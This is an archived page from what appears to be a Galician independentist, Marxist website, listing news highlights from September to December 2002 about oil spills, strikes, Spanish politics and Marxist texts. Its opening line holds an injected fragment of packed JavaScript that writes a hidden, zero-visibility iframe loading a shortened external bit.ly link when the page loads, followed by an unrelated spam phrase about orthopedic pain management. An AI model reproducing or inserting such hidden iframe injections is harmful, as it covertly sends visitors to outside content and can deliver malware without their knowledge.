\');',15,15,'|iframe|document|write|src|http|bit|ly|2b4mWbk|border|width|height|style|visibility|hidden'.split('|'),0,{}))" bgcolor="#FFFFFF" text="#000000" link="#FF0000" vlink="#FF0000" alink="#000066">
orthopedic pain management
·DESTAQUES ANTERIORES (Setembro, Outubro, Novembro, Dezembro 2002)

· Dezembro de 2002

- Velório do mar (+...)

- Espanha carece de meios para luitar contra a contaminaçom marinha (+...)

- A negligência do exército espanhol provoca nova contaminaçom (+...)

- Nestlé reclama umha indemnizaçom de 6 milhons de dólares ao Governo de Etiópia (+...)

- Continua o processo de destruiçom da Galiza rural (+...)

- Dezenas de milhares de pessoas nas ruas de Ferrol contra os responsáveis das marés negras (+...)

- O Povo Trabalhador Galego segue perdendo poder adquisitivo (+...)

- O BNG expulsa ao líder da CIG do Concelho de Vigo (+...)

- Queimado um camióm do exército espanhol (+...)

- Greve de fame contra os responsáveis polas marés negras (+...)

- A monarquia a limpar a ria. Fora Borbons da Galiza
PP, PSOE e BNG a mesma merda é
(+...)

- O vulcám venezuelano (+...)

- Política Operária já tem página web (+...)

- Mais dólares para a propaganda pró-imperialista (+...)

- USA despenaliza o assassinato de estado (+...)

- Galiza continua empobrecendo-se polo capitalismo espanhol (+...)

- Aznar realiza umha visita relámpago à Corunha (+...)

- 11D: o povo galego na rua contra as autoridades espanholas (+...)

- Piora a imagem internacional dos Estados Unidos (+...)

- Entrevista com o Secretário Geral da FPLP desde a prisom de Jericó (+...)

- Fala Ceibe reclama que a nova Lei de Comarcalizaçom do Berço reconheça a sua galeguidade (+...)

- Portugal confirma que as autoridades espanholas rejeitárom o seu eficaz serviço de seguimento do fuelóleo desde o satélite (+...)

- Assim nos enganam: mostra das principais mentiras difundidas polo PP (+...)

- 6 De Dezembro.Nem Constituiçom, Nem Estatuto.Independência Nacional (+...)

- Galiza à Greve Geral (+...)

- O Povo Trabalhador combate a maré (+...)

- O Bloque responde em espanhol nas Ruas da Galiza (+...)

- ... e chegou a segunda maré negra... O Borbom passeou por Mugia e Lage, declarando: "cumpre ajudarmos todos e fazer menos fotos demagógicas". Porém, ninguém o viu agarrar umha pá, mas sim lhe fôrom feitas dúzias de fotos, tam demagógicas como as do Zapatero e o Rajoi. Logo da reportagem fotográfica, voou de volta para Espanha. Borbons fora da Galiza!!!

- O povo galego resposta (+...)

- O Governo espanhol censura e manipula (+...)

- "Em Porto Rico, luitamos pola independência do nosso país" (+...)

· Novembro de 2002

- O BNG outorga a medalha da cidade de Vigo à armada espanhola (+...)

- Festa da revista Política Operária 17.º Aniversário (+...)

- 10 DE DEZEMBRO: GREVE GERAL EM PORTUGAL. Os e as camaradas portugueses da Política Operária acabam de fazer público o seu apoio à greve geral prevista em Portugal para o próximo dia 10 de Dezembro. Reproduzimos o seu manifesto público ante a jornada de luita do povo trabalhador português. (+...)

- A esquerda indigenista ganha as eleiçons no Equador. Os meios pró-imperialistas ianques e espanhóis já começam a manobrar ante o novo cenário criado no Equador após a vitória eleitoral de umha coligaçom de forças progressistas que pola primeira vez na história incorporará as organizaçons indigenistas ao Governo. As televisons começam a falar do "Chávez equatoriano". Neste artigo de opiniom, o autor aproxima-nos das perspectivas que se abrem no país andino.(+...)

- A Galiza no topo dos países mais castigados polas grandes marés negras nos últimos 25 anos. Das quase cinqüenta grandes marés negras por derramamento de petróleo e derivados às águas do mundo nos últimos 25 anos, cinco -10%- produzírom-se na nossa naçom (+...)

- A descoordenaçom e lentidom em agir provoca umha catástrofe ecológica na Costa da Morte. Primeira Linha solicita a demissom de Arsénio Fernandez de Mesa, Delegado do governo espanhol na Galiza, e de Manuel Fraga Iribarne pola lentidom na adopçom das medidas necessárias para evitar esta catástrofe que ciclicamente padece a nossa naçom. (+...)

- Umha nova vítima do terrorismo patronal. Manuel Branco Grande, operário da construçom de 27 anos faleceu quando o 18 de Novembro trabalhava na obra dum prédio no bairro de Salgueirinhos de Compostela. (+...)

- A classe trabalhadora continua perdendo poder adquistivo. Segundo as próprias fontes oficiais o IPC na Comunidade Autónoma situou-se no mês de Outubro em 1.4%, quatro décimas mais que a média do Estado espanhol (+...)

- O exército espanhol só logra recrutar 800 soldados. Mais umha vez fracassam estrepitosamente os planos de incremento das Forças Armadas que leva anos impulsionando o militarismo espanhol. Nos primeiros nove mese de 2002 tam só logrou recrutar 800 soldados dos 12.000 previstos.
Esta magnífica notícia exprime a grave crise de identidade nacional à que se ve submetida Espanha.

- O Che contra o burocratismo .O novo título da nossa Biblioteca Marxista em Galego recupera um texto do Che Guevara em que analisa o problema do burocratismo na jovem revoluçom cubana. (+...)

- Trotsky e a questom nacional . Incorporamos um novo texto à nossa Biblioteca Marxista em Galego. Trata-se de um artigo em que Leon Trotsky fai explícito o seu apoio à luita independentista no seu país, a Ucránia, na altura incorporada à URSS. Texto de interesse para tanto "esquerdista" espanhol refractário em nome do marxismo ao direito das naçons sem Estado à sua separaçom. (+...)

- Fraga opina que a morte de cinco trabalhadores em Gasteiz em 1976 "nom foi umha actuaçom excessiva" (+...)

- Novo texto do Che na Biblioteca Marxista em Galego, "O Socialismo e o homem em Cuba". Caro companheiro: acabo estas notas em viagem por África animado polo desejo de cumprir, embora tarde, a minha promessa. Gostava de fazê-lo tratando o tema do título. .(+...)

- Documentados os maus tratos dos USA contra presos árabes (+...)

- Manifestaçons na Rússia e Ucránia comemoram a revoluçom de 1917 (+...)

· Setembro de 2002

- País Basco : "Isto é o fim da democracia". A violenta repressom contra a massiva manifestaçom silenciosa de Bilbo confirma nom só a ofensiva espanhola, mas também o colaboracionismo dos nacionalismos autonomistas (+...)

- "Declaraçom de princípios de um democrata espanhol". Artigo do filósofo Santiago Alba, dedicado à hipocrisia que sustenta a ideologia dominante no Estado espanhol no referente às condenas e aos terrorismos (+...)

- O petróleo, chave das agressons contra o Iraque. Umha invasom do país de Saddam Hussein polos Estados Unidos, com ou sem a cobertura da ONU, pode provocar um novo "choque do petróleo", como os de 73 e 80 (+...)

- Faleceu Roberto Vidal Bolanho, referente do compromisso intelectual com a liberdade da Galiza. Tinha 52 anos e era um vulto do teatro galego, empenhado profissional e vitalmente na construçom do nosso teatro nacional. Nestes tristes momentos, destacamos o seu compromisso com a causa galega, nuns tempos em que a generalidade da chamada intelectualidade está acomodada ou ao serviço do sistema.

- Novo texto de formaçom marxista na secçom de Documentaçom. Quadro explicativo das duas teorias antagónicas sobre o contexto mundial. A burguesa neoclássica e neoliberal e a marxista. Texto para a formaçom teórica no marxismo, da autoria de Iñaki Gil de San Vicente (+...)

- Publicada a segunda ediçom de Esplendor, crise e reconstruçom da alternativa comunista. Abrente Editora publicou reeditou a obra de Justo de la Cueva, que parte da intervençom do seu autor nas IV Jornadas Comunistas Galegas celebradas há dous anos. Trata-se de umha brilhante análise da história do movimento comunista, de leitura imprescindível (+...)

- Governo de Sri Lanka e Tigres de Libertaçom Tamil iniciam negociaçons para a soberania do povo Tamil.O povo Tamil enfrenta-se de armas na mao ao estado de Sri Lanka desde 1983, pola conquista da independência. Pola primeira vez, produz-se a negociaçom entre as partes (+...)

- USA forneceu armas biológicas ao Iraque nos anos 80. O povo Tamil enfrenta-se de armas na mao ao estado de Sri Lanka desde 1983, pola conquista da independência. Pola primeira vez, produz-se a negociaçom entre as partes (+...)

- Novo texto do Che Guevara na Biblioteca Marxista em Galego. Incorporamos o terceiro texto do Che na nossa Biblioteca: "Outras serras do mundo me reclamam", célebre carta dirigida a Fidel em 1965 com motivo da sua renúncia aos cargos na direcçom revolucionária cubana para a sua incorporaçom à luita internacionalista. Este texto representa um documento humano e político de primeira magnitude na trajectória vital do Che Guevara. Publicamos a sua primeira ediçom galega e digital (+...)

- O PP quer que a nova Constituiçom europeia declare "imutáveis" as actuais fronteiras. O PP esclarece a sua principal preocupaçom em matéria de nacionalismos periféricos, ao propor que a nova Constituiçom da UE consagre como imutáveis as actuais fronteiras estatais. Trata assim de impossibilitar a emancipaçom nacional de qualquer povo incluido na UE. Assim de claro. Assim de "democrático" (+...)

- Um exemplo de manipulaçom informativa. Maite Soroa comenta nas página de Gara um caso eloqüente de manipulaçom informativa no jornal madrileno "La Razón". Como inventar umha "notícia" sobre Batasuna quando nom há material informativo (+...)

- Ao PSOE nom lhe chegam os mais de 7.000 polícias e guardias civiles espanhóis e 6.500 agentes privados presentes na Galiza. No PSOE dim que a Galiza padece "défice de efectivos" das forças repressivas espanholas, apesar de reconhecerem a presença de mais de 7.000 polícias e guardias civiles (2.724 e 4.285 elementos respectivamente). Exigem mais efectivos (+...)

- Plenário da Assembleia da Língua. A Assembleia da Língua, organizaçom criada com o intuito de coordenar a acçom reintegracionista, chega neste novo plenário a um ponto de inflexom na sua trajectória. Após ter unificado um grande número de pessoas e com o apoio dalgumhas das organizaçons mais importantes neste ámbito, afronta agora os pontos fulcrais da sua acçom (+...)

- Sinistros laborais: Umha trabalhadora ou trabalhador morto cada 2 dias. Os dados oficiais de sinistralidade laboral na Galiza som contundentes. Nos seis primeiros meses deste ano 2002, produzírom-se 23.178 acidentes laborais com baixa, o que supom um incremento de 3% a respeito de 2001. Deles, 455 fôrom graves e 44 tivérom como resultado a morte do acidentado ou acidentada (+...)

- Um aluno em práticas despedido dum hotel por falar galego ao director. O "atrevimento" de empregar o galego para dirigir-se ao director do Hotel custou-lhe o posto, ficando excluido do mesmo no primeiro dia. O director do Hotel, Carlos Salgado, reconheceu que esse foi o motivo (+...)

- Intervençom de Cuba ante a Cimeira de Johannesburgo. Reproduzimos as palavras do ministro de Relaçons Exteriores de Cuba, Felipe Pérez Roque, na Cimeira de Desenvolvimento Sustentável de Johannesburgo, em 3 de Setembro de 2002 (+...)

- Como com Franco!.O Estado espanhol ataca frontalmente os direitos de associaçom, de reuniom, de manifestaçom e de expressom. O Governo autonómico basco e o juiz Baltasar Garzón proíbem manifestaçons e dam novos passos repressivos (+...)

Voltar ao topo

 

Ver Destaques dos meses de Junho-Julho-Agosto de 2002

Voltar à página principal

 

 

Aqui encontrarás todas as notícias e outros textos incluidos na secçom de Destaque do nosso sítio-web, ordenados mês a mês partindo do mais recente até os mais antigos.